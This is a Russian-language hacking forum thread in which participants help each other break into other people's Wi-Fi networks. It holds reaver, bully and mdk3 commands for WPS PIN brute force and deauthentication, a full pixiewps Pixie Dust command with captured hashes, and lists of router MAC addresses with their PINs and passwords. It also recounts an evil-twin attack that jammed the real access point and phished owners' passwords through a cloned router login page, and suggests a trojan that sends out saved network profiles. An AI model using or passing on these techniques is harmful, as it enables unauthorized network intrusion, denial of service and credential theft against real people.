Возможно в Backtrack старая версия mdk3. А возможно эта модель/прошивка не реагирует на mdk3. У меня был успешный опыт на wifislax версий 4.7 и 4.8. Еще может зависеть от драйвера для wi-fi адаптера. Какой он в BackTrack свежести надо смотреть. Кстати адаптер у меня alfa awus036h. От самого адаптера может и не зависит, а вот адаптер+драйвер уже больше вариаций.

А еще лог похож на слабую связь с точкой или на наличие помех.

TOX1C
13.01.2015, 23:27
асус ещё божеские роутеры, можно и подождать. Если есть желание, можешь проверить сам, работает или нет. Методика есть к очень старым роутерам.

Vikhedgehog
14.01.2015, 00:32
асус ещё божеские роутеры, можно и подождать. Если есть желание, можешь проверить сам, работает или нет. Методика есть к очень старым роутерам.



Божеские? Это по-моему единственные роутеры с высокой защитой. Тут есть асус трехлетней давности, у которого локи увеличиваются в геометрической прогрессии (чем больше неправильных пинов тем дольше ждать перед следующей попыткой). А новые вообще отключают WPS навсегда (даже после ребута не включается). У TP-LINK высокий шанс, что ДОС сработает если роутер TL-WR841N/D с началом мак адреса F8:1A:67, 10:FE:ED или C0:4A:00, которые встречаются очень часто. По умолчанию стоит 8-циферный ключ, а прога генерирует пароль который тоже легко подбирается. Еще заметил что на новых TP-LINK'ах иногда встречается WEP шифрование!! Уже видел 3-4 штуки точно!

Wirexia
14.01.2015, 00:38
Wirexia

Судя по откликам ривера, он не может связаться с точкой. Нет сообщений о блокировке. Сделайте вот что: посмотрите на каком канале точка, запустите отдельно mdk3 с параметрами из скрипта на 15 секунд, остановите, подождите секунд 30 и снова посмотрите на каком канале работает точка. При успешной перезагрузке wi-fi модуля точка как правило меняет канал.

Возможно в Backtrack старая версия mdk3. А возможно эта модель/прошивка не реагирует на mdk3. У меня был успешный опыт на wifislax версий 4.7 и 4.8. Еще может зависеть от драйвера для wi-fi адаптера. Какой он в BackTrack свежести надо смотреть. Кстати адаптер у меня alfa awus036h. От самого адаптера может и не зависит, а вот адаптер+драйвер уже больше вариаций.

А еще лог похож на слабую связь с точкой или на наличие помех.



С утра гляну,щас спать лег,поставил почты брутить))

Адаптер у меня Qualcomm Atheros AR9485WB-EG,сигнал сети 60-70 % это где то -65db

ну сегодня еще раз попробую,поверчу ноут))

ivann
15.01.2015, 13:40
сигнал сети 60-70 % это где то -65db



По факту, если сигнал -65db, то это 35%-40%, но ни как не 60-70%

binarymaster
23.01.2015, 14:10
Один пользователь с сайта поделился со мной данной ссылкой, раскрывающей алгоритм генерации WPA ключа для роутера P.DG-A4001N.

http://ednolo.alumnos.upv.es/?p=1883

Другие роутеры тоже могут содержать подобный алгоритм. Python скрипт прилагается в статье.

https://bitbucket.org/dudux/adbpirelli - здесь ещё несколько скриптов генерации от автора статьи.

nik38
04.02.2015, 16:10
00-22-B0-41-AF-67 = 45825798

EC-23-3D-DC-D7-0C = 44729721

00-0C-F6-5C-DA-08 = 60851284

90-F6-52-96-54-D6 = 85144590

F8-D1-11-5C-EF-C4 = 30047723

90-F6-52-AD-FA-59 = 14018176

84-A8-E4-DA-60-EA = 16495265

40-4A-03-76-DC-57 = 77896551

и снова про ТР-link, кто посоветует пин к маку F8-1A-67-79-42-26, лок после 8-9 пинов минимум на сутки,

mdk3 не берет, использую goyskript в wifislax 4.10, спасибо

TOX1C
15.02.2015, 23:48
Где-то в этой теме видел ссылку на прогу wps pin companion, но что то не могу ее найти. Ни у кого не осталось ссылки?

ivann
16.02.2015, 00:49
TOX1C ну такой и ещё же, в router scan, есть

GeneratorWPSPIN

megafon
18.02.2015, 23:01
Подскажите по этому роутеру, вроде asus

http://rghost.ru/7nK5Tfqyp

VladimirV
19.02.2015, 05:58
Подскажите по этому роутеру, вроде asus

http://rghost.ru/7nK5Tfqyp



ASUS RT-N53 Black

ASUS RT-G32 Rev.C1

Rastamanka
27.02.2015, 02:18
Подскажите получила странный WPA PSK... Его длина 64 символа содержащий буквы и цифры. И после брута имя точки в результате не тот что брутила..


F8CC6484A7434B45c877e43dd3c47ca77da068992F11D907EF 98ca0f5c7baaa1

4pips
27.02.2015, 02:59
Точка заглючила. Скорее всего теперь называется Network с чем-нибудь и скорее всего это Zyxel. Такое бывает при подборе пина или при подключении по пину. Теперь только ждать перезагрузки хозяином.

Rastamanka
27.02.2015, 04:18
Подскажите как в Ubuntu подключиться к точке зная тока PIN?

-=charon=-
27.02.2015, 11:40
Подскажите как в Ubuntu подключиться к точке зная тока PIN?



airmon-ng start wlan0 (или какой у тебя там wlan)

reaver -i mon0 -b мак точки -c канал точки -p пин -vv

или я неправильно понял вопрос?

user100
27.02.2015, 11:45
Подскажите как в Ubuntu подключиться к точке зная тока PIN?



Вот тут было: http://forum.antichat.ru/showpost.php?p=3277235&postcount=306

ivann
27.02.2015, 20:03
Скорее, Rastamanka, надо законектиться с точкой по пину, типо как в винде, при помощи утилит QSS, Jumpstart и т.д.

binarymaster
27.02.2015, 20:23
Скорее, Rastamanka, надо законектиться с точкой по пину, типо как в винде, при помощи утилит QSS, Jumpstart и т.д.



Постом выше как раз это и объясняется, при помощи консольных команд.

4pips
01.03.2015, 17:34
Обнаружил две точки с началом в мак-адресе EC:43:F6 и названием Keenetic-dddd (d-цифры), у которых пароли kDLnTQ2h и aULnE3j6. Заинтересовало совпадение Ln. Посмотрите в своих результатах подобные точки, встречается ли Ln в паролях, а может еще какие-нибудь совпадения обнаружатся.

Добавлено: нашел еще один, но он далек от первых двух - GEYpKtrR, может у кого-то будет что-то похожее.

SlNik
01.03.2015, 17:52
Обнаружил две точки с началом в мак-адресе EC:43:F6 и названием Keenetic-dddd (d-цифры), у которых пароли kDLnTQ2h и aULnE3j6. Заинтересовало совпадение Ln. Посмотрите в своих результатах подобные точки, встречается ли Ln в паролях, а может еще какие-нибудь совпадения обнаружатся.



У меня на аналогичном: Rs9nTvi7 . nT - как у вас в первом.

SEGA_1986
02.03.2015, 19:55
Подскажите пожалуйста, искал, чего-то нигде не могу найти.

Какую команду написать в ривере (minidwep) что-бы продолжить перебор с определённого пина?

elepol61
02.03.2015, 20:32
Подскажите пожалуйста, искал, чего-то нигде не могу найти.

Какую команду написать в ривере (FeedingBoottle) что-бы продолжить перебор с определённого пина?



а что в FeedingBoottle есть ривер?

SEGA_1986
03.03.2015, 01:43
а что в FeedingBoottle есть ривер?



СОРРИ! переклинило))) в minidwep-gtk

SlNik
03.03.2015, 03:03
СОРРИ! переклинило))) в minidwep-gtk



Прописать нужный пин в файле соответствующей точки. Файл должен находиться в папке где ривер сохраняет результат. Вид файла: ХХХХХХХХХХХХ.wpc. Где ХХХХХХХХХХХХ мак адрес точки.

Или как вариант -p хххх когда известна первая половина пина, перебирает вторую.

-p хххххххх долбит конкретный пин.

G100M
06.03.2015, 22:52
Друзья, существует ли уже полная таблица или утилита для расковыривания ссидов? Желательно забугорная.

------------------------------

Да, я читал почти всю тему, но я заметил что иногда на просьбу подсказать пин людям отвечают числом, которое не выдают две тулзы, которые я тут скачал(companion и pin generator). По этому интересуюсь. Ну и еще не всегда понятно какие конкретно устройства(группы устройств) уязвимы.

Ubnt
09.03.2015, 19:54
прописываю в булли

bully -b мак точки -с1 -- mon0

что надо прописать чтобы булли показывал сколько % сделано

почему то долбит один и тот же пин

Vikhedgehog
14.03.2015, 21:39
Роутеры huawei предоставляемые МГТС для подключения к ADSL можно взломать тем же способом, что и ZyXEL Keenetic. Проверено мною на сетях со SSID Wi-Fi-Router_XXXX, где XXXX - 4 цифры. Брутить хэндшейк не советую, пароль 8 знаков 0-9 A-Z.

СЕРЖ32
14.03.2015, 21:54
Роутеры huawei предоставляемые МГТС для подключения к ADSL можно взломать тем же способом, что и ZyXEL Keenetic. Проверено мною на сетях со SSID Wi-Fi-Router_XXXX, где XXXX - 4 цифры. Брутить хэндшейк не советую, пароль 8 знаков 0-9 A-Z.



как кстати борешься с локами wps?

Algierd
14.03.2015, 23:03
Роутеры huawei предоставляемые МГТС для подключения к ADSL можно взломать тем же способом, что и ZyXEL Keenetic. Проверено мною на сетях со SSID Wi-Fi-Router_XXXX, где XXXX - 4 цифры. Брутить хэндшейк не советую, пароль 8 знаков 0-9 A-Z.



Не подскажите mac этих хуавеев?

Algierd
14.03.2015, 23:07
А может кто интереса ради подскажет рабочий пин к следующему ASUS'у:

D8:50:E60:5F:10

?

точка стоит совсем рядом, а брут по словарям её не берёт.

Vikhedgehog
14.03.2015, 23:09
Не подскажите mac этих хуавеев?



E8:CD:2D



как кстати борешься с локами wps?



Универсального способа нет. Если это зухель или хуавей для мгтс, то и бороться нечего, вычисляешь пин и сразу пароль получаешь. На TP-LINK можно попробовать DDoS, но этот баг уже вроде как исправили.



А может кто интереса ради подскажет рабочий пин к следующему ASUS'у:

D8:50:E60:5F:10

?

точка стоит совсем рядом, а брут по словарям её не берёт.



У асусов алгоритм wps никому еще сломать не удалось. Если по другому никак не получается, можно попробовать взломать сеть как это делуют в пиндостане, создав wifi с тем же SSID что и цель, а потом запустив DDoS на настоящую сеть. Пользователь попытается исправить проблемы с роутером, а если подключиться к вашей незашифрованной сети там уже можно стащить пароль либо попросив его при помощи http сервера с фишинговой страницей, либо отправив ему простой троян который скопирует все сетевые профили и отправит вам.

СЕРЖ32
15.03.2015, 00:33
E8:CD:2D

Универсального способа нет. Если это зухель или хуавей для мгтс, то и бороться нечего, вычисляешь пин и сразу пароль получаешь. На TP-LINK можно попробовать DDoS, но этот баг уже вроде как исправили.

У асусов алгоритм wps никому еще сломать не удалось. Если по другому никак не получается, можно попробовать взломать сеть как это делуют в пиндостане, создав wifi с тем же SSID что и цель, а потом запустив DDoS на настоящую сеть. Пользователь попытается исправить проблемы с роутером, а если подключиться к вашей незашифрованной сети там уже можно стащить пароль либо попросив его при помощи http сервера с фишинговой страницей, либо отправив ему простой троян который скопирует все сетевые профили и отправит вам.



та фигня это всё(я про точку с таким же SSID),ну подключится,дальше что?как стащишь пароль,откуда??с помощью фишинговой да,можно,но страница должна быть как две капли воды,похожую на веб морду роутера ,ну и как такое замутить? ну допустим замутишь.....какого фига,человек пароль на такой странице вводить будет,если он видет,что точка открытая .Короче это всё на очень большого лоха расчитано,из 100 точек может на одной точке такая реализация получится,а так,дохлый номер.Я знаю по Linset,по приколу юзаю или левые к точки цепляются(открытая ж )либо клиент цепляется и отцепляется(понятное дело,фишинговая страница левая вообще,на веб морду роутера никак не похожая,я бы тоже не вводил бы пасс на такой странице ),или вообще часами прога работает,и никто вообще не подключается,при этом видно,что клиента от родной точки выбивает бесконечно(mdk3 в проге долбит).Короче это тоже не вариант(с фейковой точки)

TOX1C
15.03.2015, 01:32
Как раз таки эта тема прекрасно действует. С линсетом не работал, колхозил свой велосипед из подручных устройств. На мощной точке доступа типа ubiquiti поднималась сеть с таким же ссидом, настоящая точка пиндосилась с помощью мдк3. С помощью ap response или по ссиду можно угадать, какой железо юзается на той стороне, и подогнать точную копию страницы авторизации, немного переделав под наши задачи. От подключения левых устройств спасал фильтр по маку. На говно нетбуке вручную ставились настройки сети, и веб сервер для нубов, типа topserver. Так же была сделана проверка данных, юзер ввел не тот пароль, страница выбила ошибку. В большинстве своем юзеры подвох не заподозрили и быстро слили свой пасс к сети.

Но самое обидное было то, что пароли то словарные были. Ну максимум у одного кента был телефон с буквой в конце. Сбрутить то такие пассы легко, но вот даже прожженные хешкрякеры форума взять эти сети не могли.

СЕРЖ32
15.03.2015, 01:45
Как раз таки эта тема прекрасно действует. С линсетом не работал, колхозил свой велосипед из подручных устройств. На мощной точке доступа типа ubiquiti поднималась сеть с таким же ссидом, настоящая точка пиндосилась с помощью мдк3. С помощью ap response или по ссиду можно угадать, какой железо юзается на той стороне, и подогнать точную копию страницы авторизации, немного переделав под наши задачи. От подключения левых устройств спасал фильтр по маку. На говно нетбуке вручную ставились настройки сети, и веб сервер для нубов, типа topserver. Так же была сделана проверка данных, юзер ввел не тот пароль, страница выбила ошибку. В большинстве своем юзеры подвох не заподозрили и быстро слили свой пасс к сети.

Но самое обидное было то, что пароли то словарные были. Ну максимум у одного кента был телефон с буквой в конце. Сбрутить то такие пассы легко, но вот даже прожженные хешкрякеры форума взять эти сети не могли.



та ну.....это уже заумно очень,умения нужны (подогнать точную копию страницы авторизации,и тд),Просто вот всё что ты описал,реализовано уже в Linset с одним только огромным минусом:там страница авторизации вообще тупо левая,ни как у роутеров,вообще левая.....т.е вообще лохом надо быть,что бы на такой странице пасс вбивать .А вообще удивительно,как у тебя юзеры подвох не замечали:точка то открытая,им в голову не приходило,что как так.....точка открытая,а пасс просит

Кстати какой командой пиндосил реальную точку(mdk3),а то там же комбинаций полно.Та и вообще,не все ж точки поддаются mdk3,некоторым до лампочки этот mdk3

unkwn
31.03.2015, 05:27
всем привет. что-то немного не понимаю.. вотбщем суть вот:

http://i.gyazo.com/7c79d46a4dfcdf378b916bf24a386a11.png

http://i.gyazo.com/05c9ed6004bcfaa217a286c3027f4f20.png

http://i.gyazo.com/5bc26202b75a60a6f1e73624a5f2ffc1.png

тоесть на 1 точку Длинк подходят оба пина? и как бороться с ошибкой.. весь мозг сломал уже. пользовался генератором WPS местным

мак 1C:AF:F7:2A:01:56

сигнал -75. видимо этого недостаточно??..

спасибо

binarymaster
31.03.2015, 15:49
Да, должно хотя бы до сообщения M4 доходить, сигнал слабоват.

Ещё можете попробовать поставить флаг -T 0.5 для увеличения таймаута.

ak_45
04.04.2015, 13:39
Новости с буржуйских хак-сайтов:

1. Какой-то новый вид атаки WPS Pixie Dust Attack

2. Ralink 2015 Usb Driver RT2770,2870,3070,307x,357x,etc.

(кому надо http://www.mediatek.com/en/downloads/ )

Biship
04.04.2015, 16:46
Новости с буржуйских хак-сайтов:

1. Какой-то новый вид атаки WPS Pixie Dust Attack


Вот уже и утилитку сделали...

https://forums.kali.org/showthread.php?25018-Pixiewps-wps-pixie-dust-attack-tool

unkwn
05.04.2015, 02:29
а вот видео (на англ)

и список "вайфаев" , подходящих для взлома. точки доступа+роутеры на чипах ralink+broadcom

https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y

unkwn
05.04.2015, 04:45
получилось нормально так. Zyxel Keenetic вломался на 123. хоть там ПИН NIC-24 to PIN, но все равно для теста норм. вот лог

мак: C8:6C:87:3E:3B:3B

pixiewps -e 87:ed:e4:ff:43:5c:ec:af:22:c5:bb:15:10:75:bf:0b:6d :0b:3f:98:a0:2a:de:63:59:25:9a:22:86:c4:63:65:52:2 8:9a:97:9b:87:61:d6:e0:c1:d9:c4:d3:d4:01:95:2b:7a: fe:5a:e9:39:80:3c:09:aa:84:e7:77:37:d5:f1:84:75:b4 :3d:88:c0:ce:c0:a5:9b:be:88:4f:c5:03:ba:a1:2a:41:4 f:bb:0d:6f:fe:06:02:52:be:53:92:b3:cb:db:49:6f:10: e0:5b:9f:7e:05:1c:94:d9:86:66:45:b3:31:bb:45:30:64 :72:8c:6e:59:3b:b3:06:e5:bd:a1:71:10:af:cc:98:74:5 a:77:70:82:59:62:3d:12:06:b6:41:a0:d0:43:a7:8d:da: 85:e8:66:9a:a5:e0:f2:e5:91:00:23:66:5c:3c:cd:69:71 :c4:6a:de:2e:9a:34:8c:26:91:70:c2:b2:ba:0c:75:ec:0 5:dc:f2:49:79:02:60:10:5f -s 63:c0:ef:6b:2b:4c:ec:93:b8:41:5b:f6:9e:8f:6f:c2:97 :41:b1:ea:f4:41:b1:4d:66:2d:79:83:81:60:2e:66 -z ae:90:99:61:c4:ab:dd:80:a2:dc:62:8f:12:71:5a:ae:51 :37:56:c1:93:d7:be:8a:db:81:c5:fb:cc:dc:f1:ca -a e0:7a:7f:e8:52:d1:68:36:01:90:bf:58:03:08:67:f5:9b :4c:a6:40:2d:3c:66:da:f3:6d:ea:b5:58:f5:c3:f0 -S

кстати эти данные можете себе подставить и увидите пин и точку доступа и тд.

Грабитель
05.04.2015, 08:46
Помогите советом, замучался уже с точками доступа TP_Link, у них у всех стоит защита от перебора пин кода, а точки важные.

Вопрос вот какой, можно ли через reaver поставить задержку в переборе пин кода? Только чтобы это действительно работало с TP_LINK, и пин код подбирался бы медленно, но без палева взлома.

Буду признателен за команду которой можно сделать и главное какой наиболее оптимальный лимит для TPLINK лучше поставить.

user100
05.04.2015, 15:12
Помогите советом, замучался уже с точками доступа TP_Link, у них у всех стоит защита от перебора пин кода, а точки важные.

Вопрос вот какой, можно ли через reaver поставить задержку в переборе пин кода? Только чтобы это действительно работало с TP_LINK, и пин код подбирался бы медленно, но без палева взлома.

Буду признателен за команду которой можно сделать и главное какой наиболее оптимальный лимит для TPLINK лучше поставить.



Боюсь огорчить, Tp-link уходит в lock после 10 пинов, который длиться обычно до перезагрузи ТД, так же в настройках может быть отключена авторизация по PIN, а оставлен только коннект по нажатию на кнопку.

Можете покурить тему поднятую выше , с вычислением pin через pixiewps. Но не факт что она на TP-link сработает.

vedemur
05.04.2015, 16:22
Как добыть tbf-01.cap и tbf-01.csv, ведь хендшейки без tbf?



получилось нормально так. Zyxel Keenetic вломался на 123. хоть там ПИН NIC-24 to PIN, но все равно для теста норм. вот лог

мак: C8:6C:87:3E:3B:3B

pixiewps -e 87:ed:e4:ff:43:5c:ec:af:22:c5:bb:15:10:75:bf:0b:6d :0b:3f:98:a0:2a:de:63:59:25:9a:22:86:c4:63:65:52:2 8:9a:97:9b:87:61:d6:e0:c1:d9:c4:d3:d4:01:95:2b:7a: fe:5a:e9:39:80:3c:09:aa:84:e7:77:37:d5:f1:84:75:b4 :3d:88:c0:ce:c0:a5:9b:be:88:4f:c5:03:ba:a1:2a:41:4 f:bb:0d:6f:fe:06:02:52:be:53:92:b3:cb:db:49:6f:10: e0:5b:9f:7e:05:1c:94:d9:86:66:45:b3:31:bb:45:30:64 :72:8c:6e:59:3b:b3:06:e5:bd:a1:71:10:af:cc:98:74:5 a:77:70:82:59:62:3d:12:06:b6:41:a0:d0:43:a7:8d:da: 85:e8:66:9a:a5:e0:f2:e5:91:00:23:66:5c:3c:cd:69:71 :c4:6a:de:2e:9a:34:8c:26:91:70:c2:b2:ba:0c:75:ec:0 5:dc:f2:49:79:02:60:10:5f -s 63:c0:ef:6b:2b:4c:ec:93:b8:41:5b:f6:9e:8f:6f:c2:97 :41:b1:ea:f4:41:b1:4d:66:2d:79:83:81:60:2e:66 -z ae:90:99:61:c4:ab:dd:80:a2:dc:62:8f:12:71:5a:ae:51 :37:56:c1:93:d7:be:8a:db:81:c5:fb:cc:dc:f1:ca -a e0:7a:7f:e8:52:d1:68:36:01:90:bf:58:03:08:67:f5:9b :4c:a6:40:2d:3c:66:da:f3:6d:ea:b5:58:f5:c3:f0 -S<br/>
<br/>
<br/>
кстати эти данные можете себе подставить и увидите пин и точку доступа и тд.

Vikhedgehog
05.04.2015, 17:07
На ASUS RT-N66U (2012/2013) не работает. А TP-LINK'и вроде все на atheros построены. У кого нибудь на чем-то кроме кинетиков и древних линксисов пошло?

Klaatu
05.04.2015, 17:19
pin через pixiewps. Но не факт что она на TP-link сработает.



Все tp-link сделаны на atheros(AR), либо более новые на qualcomm-atheros(QCA). Поэтому pixiewps не сработает.

Вот тут описана еще одна mdk3 атака сразу с трех mon-интерфейсов на роутер cisco, которая якобы срабатывает и перезагружает его, и перебор пинов можно продолжить. Кто хочет - дерзайте, сам я пока не пробовал.

Vikhedgehog
05.04.2015, 18:31
Судя по всему, уязвимы DIR-300 B1. Самые старые A1 не уязвимы, поскольку они на Atheros.

ohoo
05.04.2015, 20:09
Все tp-link сделаны на atheros(AR), либо более новые на qualcomm-atheros(QCA).



Не все есть еще модели которые работают на broadcom и ralink

Klaatu
05.04.2015, 20:58
Не все есть еще модели которые работают на broadcom и ralink



Например.

ohoo
05.04.2015, 21:34
broadcom TD-8610, TD-8810, TD-8811, TD-8840, TD-W8910G, TD-W8920G, TD-W8950ND, TD-W8960N

Ralink TP-Link TD-W8901N, Tp-link TD-W8101G, TP-LINK TD-W8951ND v4

Klaatu
05.04.2015, 22:00
broadcom TD-8610, TD-8810, TD-8811, TD-8840, TD-W8910G, TD-W8920G, TD-W8950ND, TD-W8960N

Ralink TP-Link TD-W8901N, Tp-link TD-W8101G, TP-LINK TD-W8951ND v4


Кое-что действительно делают на ralink и bcm. Это все adsl?

ohoo
05.04.2015, 22:09
Кое-что действительно делают на ralink и bcm. Это все adsl?



да

Onechester
06.04.2015, 01:32
приветствую, господа, а кто пользуется airslax, реально ли самому поставить в него утилиту для WPS Pixie Dust Attack

unkwn
06.04.2015, 11:14
Как добыть tbf-01.cap и tbf-01.csv, ведь хендшейки без tbf?



где ты взял такое.. смотри видео. делай также. кстати еще 1 момент, у кого стоит Kali и выбрасывает такую ошибку :

checking for pcap_open_live in -

lpcap... no

error: pcap library not found!

нужно установить 2 файла

sudo apt-get install libpcap-dev

sudo apt-get install libsqlite3-dev

после чего уже по инструкции:

*******

*********

./configure

make

make install

vedemur
06.04.2015, 15:50
Спасибо, всё сработало с учётом вашей поправки.



где ты взял такое.. смотри видео. делай также. кстати еще 1 момент, у кого стоит Kali и выбрасывает такую ошибку :

checking for pcap_open_live in -<br/>
lpcap... no<br/>
error: pcap library not found!

нужно установить 2 файла

sudo apt-get install libpcap-dev<br/>
sudo apt-get install libsqlite3-dev

после чего уже по инструкции:

*******

*********

./configure

make

make install

vedemur
06.04.2015, 16:00
На Tp-Link pin not found. Попробовал на трёх.

СЕРЖ32
06.04.2015, 16:25
Так всё таки,для каких точек эта прога подходит?У кого реально получалось пин добыть и на каких точках?

Vikhedgehog
06.04.2015, 17:03
Так всё таки,для каких точек эта прога подходит?У кого реально получалось пин добыть и на каких точках?



ZyXEL... пока особенно толку от этой проги не замечаю.

unkwn
06.04.2015, 17:49
я же писал. вот гугл док, там собраны некоторые точки доступа. + ломаются быстро все на чипах ralink и многие broadcom.

просто вбиваете модель роутера в гугл и да прибудет с вами сила

https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y список

СЕРЖ32
08.04.2015, 01:50
Что за фигня происходит......вот тестирую WPS Pixie Dust Attack,всё как в видео делаю,запускаю ривер,всё как на видео,а ривер начинает по обычному работать,т.е пины перебирать)))ну и в лок точка уходит(TP-LINK же))),смысл проги WPS Pixie Dust Attack тогда?я так из видео понял,что должна другая инфо показаться,хешы,что бы дальше команды задавать.....а инфы нет,просто ривер по обычному работает.....значит что то не правильно работает(((У Вас как,кто тестил прогу?как на видео?т.е ривер делает один перебор пина и дальше хешы показывает,или как?

СЕРЖ32
08.04.2015, 02:24
Пипец,штук 15 точек перепробовал(именно TP-LINK пробовал),везде ривер начинает просто пины перебирать и всё,т.е как на видео не происходит(ну хешы,и другая информация)просто пины перебирает......странно,чего так,в чём проблема((

unkwn
08.04.2015, 02:27
скрипт






Что за фигня происходит......вот тестирую WPS Pixie Dust Attack,всё как в видео делаю,запускаю ривер,всё как на видео,а ривер начинает по обычному работать,т.е пины перебирать)))ну и в лок точка уходит(TP-LINK же))),смысл проги WPS Pixie Dust Attack тогда?я так из видео понял,что должна другая инфо показаться,хешы,что бы дальше команды задавать.....а инфы нет,просто ривер по обычному работает.....значит что то не правильно работает(((У Вас как,кто тестил прогу?как на видео?т.е ривер делает один перебор пина и дальше хешы показывает,или как?



ты не правильно установил. смотри видео внимательно. ты ривер не пропатчил как надо. или у тебя скорее всего ошибка вылазила. глянь мои посты выше. есть фикс

пс: 95% ТП линков не ломаются... к сожалению..

СЕРЖ32
08.04.2015, 08:43
ты не правильно установил. смотри видео внимательно. ты ривер не пропатчил как надо. или у тебя скорее всего ошибка вылазила. глянь мои посты выше. есть фикс

пс: 95% ТП линков не ломаются... к сожалению..



та всё сделал как на видео,пошагово прям.......при запуске ривера,ривер и начинает работать,т.е пины перебирать....а есть то вообще точки,которые в локе,т.е с ними вообще в проге работать не получится...Думаю большинству людей и нужно тп линки сломать)),а ты говоришь не ломаются....

СЕРЖ32
08.04.2015, 09:41
та всё сделал как на видео,пошагово прям.......при запуске ривера,ривер и начинает работать,т.е пины перебирать....а есть то вообще точки,которые в локе,т.е с ними вообще в проге работать не получится...Думаю большинству людей и нужно тп линки сломать)),а ты говоришь не ломаются....



А может такое быть,что просто точки не на нужных чипах были,вот ривер попросту и пообычному работал)))?Как узнать,на каком передатчике та или иная точка работает?Забивал в гугле,ничего про тип и модель чипа не показывает,просто характеристики.Вот например нужен TP-LINK TL-WR 740N(A0:F3:C1:44:A7:4A),как узнать его начинку,подходит ли начинка для работы с прогой?А так всё правильно делал,как на видео:установил 2 файла сначала:sudo apt-get install libpcap-dev

sudo apt-get install libsqlite3-dev

Потом ривер,потом pixiewps,всё отлично запустилось,но когда запустил ривер,он просто тупо по обычному начал подбор пинов,и так ещё с десяток точек,тп линки выбирал именно...

user100
08.04.2015, 10:42
А может такое быть,что просто точки не на нужных чипах были,вот ривер попросту и пообычному работал)))?Как узнать,на каком передатчике та или иная точка работает?Забивал в гугле,ничего про тип и модель чипа не показывает,просто характеристики.Вот например нужен TP-LINK TL-WR 740N(A0:F3:C1:44:A7:4A),как узнать его начинку,подходит ли начинка для работы с прогой?А так всё правильно делал,как на видео:установил 2 файла сначала:sudo apt-get install libpcap-dev

sudo apt-get install libsqlite3-dev

Потом ривер,потом pixiewps,всё отлично запустилось,но когда запустил ривер,он просто тупо по обычному начал подбор пинов,и так ещё с десяток точек,тп линки выбирал именно...



добавь в команду запуска reaver значение -vv и будет тебе счастье.

пример: reaver -i mon0 -b aa:bb:cc:dd:ee - vv -S

СЕРЖ32
08.04.2015, 13:02
добавь в команду запуска reaver значение -vv и будет тебе счастье.

пример: reaver -i mon0 -b aa:bb:cc:dd:ee - vv -S



так я так и делал,говорю ж,всё как на видео сделал....но на видио,при запуске ривера он не перебирал как обычно,а сразу выдавал информацию о точке,прошивка,хешы какие то,а дальше подставлялись эти хеши и запускался pixiewps,а у меня просто ривер работает и всё,перебирает как обычно пины,а я то хочу запустить pixiewps...

vedemur
08.04.2015, 14:06
Tp-Link, Dlink, Asus перепробовал и Pin not found. Если Reaver не остановить, то, правильно, он будет продолжать перебор. Просто надо проследить вначале перебора-если появились необходимые данные - ривер нодо остановить и далее по инструкции. Мне ничего из перечисленных роутеров взломать не удалось (Pin not found).

СЕРЖ32
08.04.2015, 16:28
Tp-Link, Dlink, Asus перепробовал и Pin not found. Если Reaver не остановить, то, правильно, он будет продолжать перебор. Просто надо проследить вначале перебора-если появились необходимые данные - ривер нодо остановить и далее по инструкции. Мне ничего из перечисленных роутеров взломать не удалось (Pin not found).



у меня не появляются необходимые данные,т.е у меня просто тупо ривер пины перебирает(1,2,3,4 пина и тд)Т.е вот как на видео,так у меня не происходит,после перебора первого же пина,данные о точке появится должны,а у меня просто ривер пин за пином перебирает....так что что то у меня не работает,хотя всё устанавливал по инструкции,никаких ошибок не выскакивало...

Та и вообще,я так понимаю,из 50 точек,хоть бы одна так открывалась)))судя по отзывам,неговоря,если на точке вообще wps залочен,а на TP-LINK как правило как залочилось,так до перезагрузки...

vedemur
08.04.2015, 18:53
у меня не появляются необходимые данные,т.е у меня просто тупо ривер пины перебирает(1,2,3,4 пина и тд)Т.е вот как на видео,так у меня не происходит,после перебора первого же пина,данные о точке появится должны,а у меня просто ривер пин за пином перебирает....так что что то у меня не работает,хотя всё устанавливал по инструкции,никаких ошибок не выскакивало...

Та и вообще,я так понимаю,из 50 точек,хоть бы одна так открывалась)))судя по отзывам,неговоря,если на точке вообще wps залочен,а на TP-LINK как правило как залочилось,так до перезагрузки...



Сначала необходимо подключиться к интернету и по очереди ввести sudo apt-get install libpcap-dev

sudo apt-get install libsqlite3-dev, как сказано в посте 2410, потом отключиться от интернета и далее по видео, внимательно проследить и вовремя остановить перебор. Удачи.

user100
08.04.2015, 19:00
так я так и делал,говорю ж,всё как на видео сделал....но на видио,при запуске ривера он не перебирал как обычно,а сразу выдавал информацию о точке,прошивка,хешы какие то,а дальше подставлялись эти хеши и запускался pixiewps,а у меня просто ривер работает и всё,перебирает как обычно пины,а я то хочу запустить pixiewps...



Значит ты не пропатчил как надо reaver, патченый он должен показывать версию reaver 1.5. Выложи скрин с работой reaver и комманду которой reaver запускаешь.

vedemur
08.04.2015, 19:32
Значит ты не пропатчил как надо reaver, патченый он должен показывать версию reaver 1.5. Выложи скрин с работой reaver и комманду которой reaver запускаешь.



Поддерживаю, у меня тоже такое было, когда плохо пропатчил.

СЕРЖ32
08.04.2015, 19:41
Сначала необходимо подключиться к интернету и по очереди ввести sudo apt-get install libpcap-dev

sudo apt-get install libsqlite3-dev, как сказано в посте 2410, потом отключиться от интернета и далее по видео, внимательно проследить и вовремя остановить перебор. Удачи.



так так и делал,ну правда от инета не отключался...а так всё как по видео,т.е последовательно...

СЕРЖ32
08.04.2015, 19:43
Значит ты не пропатчил как надо reaver, патченый он должен показывать версию reaver 1.5. Выложи скрин с работой reaver и комманду которой reaver запускаешь.



правильно,1.5 показывает,значит пропатчил.....ну выложу скрин,как запущу всё это...

СЕРЖ32
08.04.2015, 19:45
Поддерживаю, у меня тоже такое было, когда плохо пропатчил.



тогда подробно,пошагово напиши,как пропатчил,та и вообще как всё устанавливал,т.е сначала те 2 файла,потом ривер,потом pixiewps?Спасибо заранее))

pwr2
08.04.2015, 20:29
Tp-Link, Dlink, Asus перепробовал и Pin not found.



Аналогично. На тех, что у нас более менее распространены уязвимость не работает. Кто какие модели роутеров взломал?

vedemur
08.04.2015, 20:42
тогда подробно,пошагово напиши,как пропатчил,та и вообще как всё устанавливал,т.е сначала те 2 файла,потом ривер,потом pixiewps?Спасибо заранее))



1. скопіювати в папку HOME папки pixiewps-master і reaver-wps-fork-read-only

2. підключитися до інтернету і в терміналі по черзі запустити:

apt-get install libpcap-dev

apt-get install libsqlite3-dev

і від'єднатися від інтернету

